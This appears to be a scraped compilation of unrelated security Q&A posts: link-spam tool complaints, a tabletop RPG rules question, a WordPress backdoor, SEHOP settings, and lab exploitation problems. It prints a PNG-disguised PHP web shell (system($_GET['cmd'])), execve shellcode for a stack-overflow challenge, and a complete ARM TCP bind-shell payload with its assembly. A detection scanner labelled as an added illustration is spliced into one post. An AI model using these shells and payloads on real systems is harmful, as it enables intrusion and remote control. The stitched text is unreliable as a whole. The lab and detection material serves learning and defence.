Version 15.20 has stopped making PHP Info Exploit Links

It seems that version 15.20 no longer makes PHP info exploit links. I have an install still running 15.19 and 15.17 and both are still working for these sites and make over 500 links.
Version 15.20 literally makes zero links now. In the logs it shows the following: https://www.screencast.com/t/ShaV3N8C4Oo
Those same urls are all successful on previous versions. Hope you can fix it.

Does the Dimensional Slide arcanist exploit allow you to avoid AoO from the starting position of movement?

I recently had a discussion with my GM about Dimensional Slide exploit. The problem is the wording of the exploit:

"This ability is used as part of a move action or withdraw action, allowing her to move up to 10 feet per arcanist level to any location she can see. This counts as 5 feet of movement. She can only use this ability once per round. She does not provoke attacks of opportunity when moving in this way, but any other movement she attempts as part of her move action provokes as normal."

I haven’t found any rules about the description of "as a part of move action". Is it meant that I must start moving, for example, from a threatened square, provoking an AoO, then do DS, or simply perform DS w/o any AoOs?

It is unclear whether "as part of the action" requires you to make this action exclusively in the middle of an action, not before or after it.

Please, follow your answer with some rules link, so it can be an approved point, not just an opinion, because I really need some solid evidence ;D

Thank you.

P.S. I’ve read the thread below, and it states that I can avoid AoOs from any point of blinking, but it has no proof of ability to do so by rules.

Arcanist Dimensional Slide usage specific cases!

Backdoor exploit – could they have downloaded files from server?

Due to a customer running old WordPress plugins, a php file with the following code was added to their website:

    ‰PNG <?php $str = $_GET['cmd']; system($str); ?>

The above file was detected by Wordfence as "Backdoor:PNG/ImageMagic.7484 Executable code masquerading as an image."

This (or another exploit) appears to have given the intruder the ability to at least upload files, as text files containing the words "Hacked by …" were added to various places on the server.

Using this exploit, what kind of access would be allowed onto the server besides the ability to upload files? Could they have also downloaded files from anywhere on the server?

We are running a cPanel environment on Apache, MySQL and PHP.
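As an added illustration for the question above (not code from the post or from Wordfence): a small defender-side scanner for the "executable code masquerading as an image" pattern. It flags files that start with an image magic header but also contain a PHP open tag, and reports which command-execution sinks are fed by request data. A file like the one quoted runs arbitrary shell commands with the web server's privileges, so reading any file that user can open is within its reach; the file contents below are constructed samples.

```python
"""Scanner for image-disguised PHP web shells (added example)."""
import re

# Image magic bytes a web shell may borrow to pass naive extension/MIME checks.
IMAGE_MAGIC = {
    b"\x89PNG\r\n\x1a\n": "PNG",
    b"\xff\xd8\xff": "JPEG",
    b"GIF89a": "GIF",
    b"GIF87a": "GIF",
}

# PHP functions that hand a string to the shell or evaluate it as code.
SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval", "assert")
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(", re.I)
SUPERGLOBAL_RE = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b")

def scan_bytes(data: bytes) -> dict:
    """Classify one file body and return the findings."""
    magic = next((name for sig, name in IMAGE_MAGIC.items() if data.startswith(sig)), None)
    text = data.decode("latin-1")  # keep every byte; PHP source is byte-oriented
    has_php = "<?php" in text or "<?=" in text
    sinks = sorted({m.group(1).lower() for m in SINK_RE.finditer(text)})
    tainted = bool(SUPERGLOBAL_RE.search(text))
    return {
        "image_magic": magic,
        "has_php": has_php,
        "sinks": sinks,
        "request_controlled": tainted,
        # Image header + PHP + a sink reading request data: a web shell. Whoever
        # reaches it runs commands as the web server user, so any file that user
        # can open can be read or copied out, not just uploaded.
        "webshell": magic is not None and has_php and bool(sinks) and tainted,
    }

# Constructed samples: the backdoor quoted in the post, and a PNG-looking stub.
BACKDOOR = b"\x89PNG\r\n\x1a\n<?php $str = $_GET['cmd']; system($str); ?>"
BENIGN_PNG = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + b"\x00" * 16

if __name__ == "__main__":
    for name, body in (("backdoor.png", BACKDOOR), ("logo.png", BENIGN_PNG)):
        print(name, scan_bytes(body))
```

Run it over the web root (e.g. feeding each file's bytes to scan_bytes) to find further copies; any hit should be treated as full command execution by the web server user, and the audit should cover what that user could read, including wp-config.php and database contents.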

Android exploit demos to scare my parents?

I recently discovered that my parents’ android phones have not received security updates for years. When I talked to them I realized that the benefit of software updates is very abstract to them and that they clearly felt like I was overreacting.

I personally really understood the importance of software updates by watching exploit demos at IT conferences. So now I am wondering: Are there such demos aimed at educating everyday users?

I am thinking of something like https://haveibeenpwned.com/ or https://amiunique.org/ but for android.

Windows Exploit Protection: what is SEHOP setting: “TelemetryOnly” for?

I’m reading up on the different exploit protection methods from MS. One is SEHOP; if I check it e.g. with PS:

Get-ProcessMitigation -System

I get:

    Enable                             : NOTSET
    TelemetryOnly                      : OFF
    Audit                              : NOTSET
    Override SEHOP                     : False

What is "TelemetryOnly"? Internet search was not successful so far.

Thanks for hints and resources!

VSFTPD Exploit failed, unreachable

Working on a school project and I’m encountering an issue when trying to run the exploit in Metasploit. I’m using the vsftp exploit and when I run the exploit an error pops up:

"Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.1:21) Exploit Completed, but no session was created."

Running all this in a VM of Kali Linux.

Any help would be appreciated.

How to Exploit DOM XSS? [closed]

Is it exploitable or not?

Issue detail

The application may be vulnerable to DOM-based cross-site scripting. Data is read from window.location and passed to the wrap() function of JQuery via the following statement:

Turbolinks.Location.wrap(window.location)   ("replace",e,t)},e.prototype.onPopState=function(e){var t,n,i,a;return this.shouldHandlePopState()&&(a=null!=(n=e.state)?n.turbolinks:void 0)?(t=Turbolinks.Location.wrap(window.location),i=a.restorationIdentifier,this.delegate.historyPoppedToLocationWithRestorationIdentifier(t,i)):void 0}, 


Exploit education stack-five: trouble opening shell

I’m trying the phoenix VM, challenge stack-five on exploit.education (http://exploit.education/phoenix/stack-five/). I ran into a problem while exploiting a stack overflow. The challenge is to run execve(‘/bin/sh’) through shellcode. I grabbed the shellcode from shell-storm (http://shell-storm.org/shellcode/files/shellcode-603.php). The shellcode consists of:

    [NOP slide]
    (debug int3 \xcc)
    "\x48\x31\xd2"                                  // xor    %rdx, %rdx
    "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"      // mov    $0x68732f6e69622f2f, %rbx
    "\x48\xc1\xeb\x08"                              // shr    $0x8, %rbx
    "\x53"                                          // push   %rbx
    "\x48\x89\xe7"                                  // mov    %rsp, %rdi
    "\x50"                                          // push   %rax
    "\x57"                                          // push   %rdi
    "\x48\x89\xe6"                                  // mov    %rsp, %rsi
    "\xb0\x3b"                                      // mov    $0x3b, %al
    "\x0f\x05";                                     // syscall
    (debug int3 \xcc)
    [padding]
    [override rip pointing to the middle of the NOP slide]

I have tested int3’s before and after the shellcode and all seems fine: they both trigger outside and inside gdb, and therefore I infer that the shellcode is being executed, but I cannot get the shell to open.

I’m using these commands:

cat | /opt/phoenix/amd64/stack-five < exploit 
cat exploit - | /opt/phoenix/amd64/stack-five 

Neither of them gets the shell.

Example of execution

    user@phoenix-amd64:~$ cat exploit - | /opt/phoenix/amd64/stack-five
    cat exploit - | /opt/phoenix/amd64/stack-five
    Welcome to phoenix/stack-five, brought to you by https://exploit.education
    [ 7018.986649] traps: stack-five[433] trap int3 ip:7fffffffe68e sp:7fffffffe6c8 error:0
    whoami
    Trace/breakpoint trap

This int3 is AFTER the shellcode.

Some idea of what’s wrong?

How can I exploit a buffer overflow on a Raspberry Pi 4?

I am trying to exploit a buffer overflow on a Raspberry Pi 4, which makes use of a Cortex-A72 (ARM v8) 64-bit SoC. The Linux kernel version is v4.19 and the OS is a Debian Buster compiled for the Raspberry Pi ARM architecture.

Vulnerable code

    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
      char buffer[64];

      gets(buffer);
    }

Compilation options
The code above is compiled with all protections deactivated.

gcc -no-pie -Wl,-z,norelro -fno-stack-protector -z execstack program.c -o program 


Payload
The payload is generated with the following perl code:

    #!/usr/local/bin/perl

    $nopsled = "\x01\x10\xa0\xe1";
    $gad_blx_sp = "\xD5\xAF\xE7\xB6"; # address for gadget "blx sp" in libc

    $Shellcode =
        "\x06\x60\x46\xe0" . "\x01\x30\x8f\xe2" . "\x13\xff\x2f\xe1" . "\x02\x20\x01\x21" .
        "\x92\x1a\xc8\x27" . "\x51\x37\x01\xdf" . "\x04\x1c\x12\xa1" . "\x4a\x70\x0e\x71" .
        "\x4a\x71\x8a\x71" . "\xca\x71\x10\x22" . "\x01\x37\x01\xdf" . "\xc0\x46\x20\x1c" .
        "\x02\x21\x02\x37" . "\x01\xdf\x20\x1c" . "\x49\x1a\x92\x1a" . "\x01\x37\x01\xdf" .
        "\x04\x1c\x3f\x27" . "\x20\x1c\x49\x1a" . "\x01\xdf\x20\x1c" . "\x01\x31\x01\xdf" .
        "\x20\x1c\x01\x31" . "\x01\xdf\x05\xa0" . "\x49\x40\x52\x40" . "\xc2\x71\x0b\x27" .
        "\x01\xdf\xc0\x46" . "\x02\xff\x11\x5c" . "\x01\x01\x01\x01" . "\x2f\x62\x69\x6e" .
        "\x2f\x73\x68\x58" . "\x00\x00\x00\x00";

    print "$nopsled" x 17; # 4 bytes x 17 = 68
    print "$gad_blx_sp";
    print "$Shellcode";

The gadget location in libc (B6E7 AFD5 in big endian) was found by searching for it with ropper:

Blx gadget address

Its absolute address during execution can be calculated by adding it to the address found with the vmmap command in the gdb enhancement tool gef:

Gef vmmap command

Shellcode
The shellcode that you can see in the Perl above was assembled from assembly code that you can find on Azeria’s website. I changed it a little to avoid a badchar. More details from Azeria on her amazing website https://azeria-labs.com/tcp-bind-shell-in-assembly-arm-32-bit/ :

    .section .text
    .global _start

    _start:
        .ARM
        sub r6, r6, r6       // use r6 instead of r2 during strb r6, [r1, #4] below to avoid badchar 0x0a
        add r3, pc, #1       // switch to thumb mode
        bx r3

        .THUMB
    // socket(2, 1, 0)
        mov r0, #2
        mov r1, #1
        sub r2, r2, r2       // set r2 to null
        mov r7, #200         // r7 = 281 (socket)
        add r7, #81          // r7 value needs to be split
        svc #1               // r0 = host_sockid value
        mov r4, r0           // save host_sockid in r4
    // bind(r0, &sockaddr, 16)
        adr  r1, struct_addr // pointer to address, port
        strb r2, [r1, #1]    // write 0 for AF_INET
        strb r6, [r1, #4]    // replace 1 with 0 in x.1.1.1
        strb r2, [r1, #5]    // replace 1 with 0 in 0.x.1.1
        strb r2, [r1, #6]    // replace 1 with 0 in 0.0.x.1
        strb r2, [r1, #7]    // replace 1 with 0 in 0.0.0.x
        mov r2, #16          // struct address length
        add r7, #1           // r7 = 282 (bind)
        svc #1
        nop
    // listen(sockfd, 0)
        mov r0, r4           // set r0 to saved host_sockid
        mov r1, #2
        add r7, #2           // r7 = 284 (listen syscall number)
        svc #1
    // accept(sockfd, NULL, NULL);
        mov r0, r4           // set r0 to saved host_sockid
        sub r1, r1, r1       // set r1 to null
        sub r2, r2, r2       // set r2 to null
        add r7, #1           // r7 = 284+1 = 285 (accept syscall)
        svc #1               // r0 = client_sockid value
        mov r4, r0           // save new client_sockid value to r4
    // dup2(sockfd, 0)
        mov r7, #63          // r7 = 63 (dup2 syscall number)
        mov r0, r4           // r4 is the saved client_sockid
        sub r1, r1, r1       // r1 = 0 (stdin)
        svc #1
    // dup2(sockfd, 1)
        mov r0, r4           // r4 is the saved client_sockid
        add r1, #1           // r1 = 1 (stdout)
        svc #1
    // dup2(sockfd, 2)
        mov r0, r4           // r4 is the saved client_sockid
        add r1, #1           // r1 = 2 (stderr)
        svc #1
    // execve("/bin/sh", 0, 0)
        adr r0, shellcode    // r0 = location of "/bin/shX"
        eor r1, r1, r1       // clear register r1. r1 = 0
        eor r2, r2, r2       // clear register r2. r2 = 0
        strb r2, [r0, #7]    // store null-byte for AF_INET
        mov r7, #11          // execve syscall number
        svc #1
        nop

    struct_addr:
    .ascii "\x02\xff"        // AF_INET 0xff will be NULLed
    .ascii "\x11\x5c"        // port number 4444
    .byte 1,1,1,1            // IP Address
    shellcode:
    .ascii "/bin/shX"

The following command can be used to generate the ascii equivalent of the code above after assembly:

    as bind_shell.s -o bind_shell.o && ld -N bind_shell.o -o bind_shell
    objcopy -O binary bind_shell bind_shell.bin
    hexdump -v -e '"\""x" 1/1 "%02x" ""' bind_shell.bin

During execution
Now when everything is set up (executable compiled, payload ready with gadget address and shellcode), in gdb when I enter the payload after launching the executable I get a SIGILL error. I do not know what is causing it.

Sigill error message

Below is some exception context info

sigill context info

The payload works fine on Raspberry Pi 3 but not on Raspberry Pi 4; both run kernel 4.19 and OS Raspbian Buster.

NOTE : I do not get this error when stepping into the shellcode on the stack though.

Question : Does anybody know what new protection measure on the SoC/kernel/OS could be the cause? How can I deactivate these security measures?